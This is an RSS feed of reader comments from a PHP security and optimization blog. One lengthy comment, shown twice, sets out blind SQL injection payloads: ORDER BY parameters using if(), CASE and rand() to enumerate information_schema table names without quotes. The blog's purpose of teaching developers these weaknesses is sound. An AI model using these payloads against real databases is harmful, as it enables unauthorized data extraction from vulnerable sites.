Comments for Joseph Keeler http://josephkeeler.com PHP/LAMP Development and Software Process Improvement Tue, 22 Feb 2011 19:14:37 +0000 hourly 1 http://wordpress.org/?v=3.3.1 Comment on PHP Upload Security & The 1×1 jpeg Hack by Makavillian http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/comment-page-1/#comment-1223 Makavillian Tue, 22 Feb 2011 19:14:37 +0000 http://josephkeeler.com/?p=3#comment-1223 Great post, I wasn't aware of this either. Great post, I wasn’t aware of this either.

]]> Comment on PHP Upload Security & The 1×1 jpeg Hack by paul http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/comment-page-1/#comment-1107 paul Thu, 06 Jan 2011 18:04:19 +0000 http://josephkeeler.com/?p=3#comment-1107 Never even gave that a thought...naively thought mime types could be relied on....now changing my image upload class. There must be a hell of a lot of unsecured upload scripts out there! Never even gave that a thought…naively thought mime types could be relied on….now changing my image upload class. There must be a hell of a lot of unsecured upload scripts out there!

]]> Comment on PHP Upload Security & The 1×1 jpeg Hack by Nikos http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/comment-page-1/#comment-1059 Nikos Sun, 12 Dec 2010 09:02:37 +0000 http://josephkeeler.com/?p=3#comment-1059 This handles nicely that php code will not be executed. how about xss? This handles nicely that php code will not be executed. how about xss?

]]> Comment on PHP Security – Escape proof SQL injection in ORDER BY clause by Mark Vice http://josephkeeler.com/2009/05/php-security-sql-injection-in-order-by/comment-page-1/#comment-652 Mark Vice Sat, 12 Jun 2010 10:01:16 +0000 http://josephkeeler.com/?p=46#comment-652 I love it! I love it!

]]> Comment on PHP Security – Escape proof SQL injection in ORDER BY clause by Jacco van Tuijl http://josephkeeler.com/2009/05/php-security-sql-injection-in-order-by/comment-page-1/#comment-637 Jacco van Tuijl Sun, 30 May 2010 05:56:26 +0000 http://josephkeeler.com/?p=46#comment-637 eXploiting SQL injection in ORDER BY clause (MySQL 5) by Jacco van Tuijl This URL will show a list orderd by column 1 : http://www.test.com/list.php?orderby=1 This is what the SQL query that is executed on the database might look like: SELECT id,name,price FROM list ORDER BY 1 If it would be vulnerable to SQL injection we could try : http://www.test.com/list.php?orderby=if(true,id,price) and http://www.test.com/list.php?orderby=if(false,id,price) to see if they give a different result or http://www.test.com/list.php?orderby=(select case when (true) then id else price end) and http://www.test.com/list.php?orderby=(select case when (true) then id else price end) to see if they give a different result. If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this: http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price) and this: http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end) The backside of these methods is that they require knowlage of the column names. So I worked out some different method that doesn't require knowlage about column names. ORDER BY rand() We can make a request like this: http://www.test.com/list.php?orderby=rand(true) returns a different result then this request: http://www.test.com/list.php?orderby=rand(false) We can use it to enumerate the first char of the table_name in information_schema.tables like this: http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)) And it is all quoteless! Greetingz, Jacco van Tuijl eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl

This URL will show a list orderd by column 1 :

http://www.test.com/list.php?orderby=1

This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1

If it would be vulnerable to SQL injection we could try :

http://www.test.com/list.php?orderby=if(true,id,price)

and

http://www.test.com/list.php?orderby=if(false,id,price)

to see if they give a different result

or

http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
to see if they give a different result.

If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)

The backside of these methods is that they require knowlage of the column names.
So I worked out some different method that doesn't require knowlage about column names.

ORDER BY rand()

We can make a request like this:

http://www.test.com/list.php?orderby=rand(true)

returns a different result then this request:

http://www.test.com/list.php?orderby=rand(false)

We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

And it is all quoteless!

Greetingz,
Jacco van Tuijl

]]> Comment on PHP Security – Escape proof SQL injection in ORDER BY clause by Henry http://josephkeeler.com/2009/05/php-security-sql-injection-in-order-by/comment-page-1/#comment-408 Henry Mon, 16 Nov 2009 17:53:21 +0000 http://josephkeeler.com/?p=46#comment-408 Thank you for this. It really gave something to think about. Thank you for this. It really gave something to think about.

]]> Comment on PHP Security – Escape proof SQL injection in ORDER BY clause by mol http://josephkeeler.com/2009/05/php-security-sql-injection-in-order-by/comment-page-1/#comment-118 mol Fri, 17 Jul 2009 15:05:14 +0000 http://josephkeeler.com/?p=46#comment-118 this is really interesting, especially the fact that people think a mysql_real_escape_string() is enough to protect them against any attack. The exploit isnt trivial though. this is really interesting, especially the fact that people think a mysql_real_escape_string() is enough to protect them against any attack. The exploit isnt trivial though.

]]> Comment on PHP Upload Security & The 1×1 jpeg Hack by Phillip Harrington http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/comment-page-1/#comment-8 Phillip Harrington Sat, 16 May 2009 01:42:59 +0000 http://josephkeeler.com/?p=3#comment-8 I actually considered doing this - renaming, reprocessing the image and appending a new extension. I was not, however, aware of this attack - or of the fix. Thanks for this article! Keep it up! I'm enjoying very much the security and optimization focus of your first few entries. And as promised, I'm subscribing! I actually considered doing this – renaming, reprocessing the image and appending a new extension. I was not, however, aware of this attack – or of the fix. Thanks for this article! Keep it up! I’m enjoying very much the security and optimization focus of your first few entries. And as promised, I’m subscribing!

]]> Comment on PHP Optimization – Where to start by Joseph Keeler » PHP Performance - Optimize, Eliminate or Scale http://josephkeeler.com/2009/05/php-optimization-where-to-start/comment-page-1/#comment-7 Joseph Keeler » PHP Performance - Optimize, Eliminate or Scale Thu, 14 May 2009 22:07:09 +0000 http://josephkeeler.com/?p=20#comment-7 [...] approaches you can take.  First, find out where your system performance can best be improved - see PHP Optimization - Where to Start.  Once you know where your biggest bottlenecks are, you can either optimize that code, eliminate [...] [...] approaches you can take.  First, find out where your system performance can best be improved – see PHP Optimization – Where to Start.  Once you know where your biggest bottlenecks are, you can either optimize that code, eliminate [...]

]]> Comment on PHP Optimization – Where to start by Adam Culp http://josephkeeler.com/2009/05/php-optimization-where-to-start/comment-page-1/#comment-5 Adam Culp Tue, 12 May 2009 02:26:19 +0000 http://josephkeeler.com/?p=20#comment-5 All very valid points. Thank. Perhaps you will write a "How To" later? All very valid points. Thank. Perhaps you will write a “How To” later?

]]>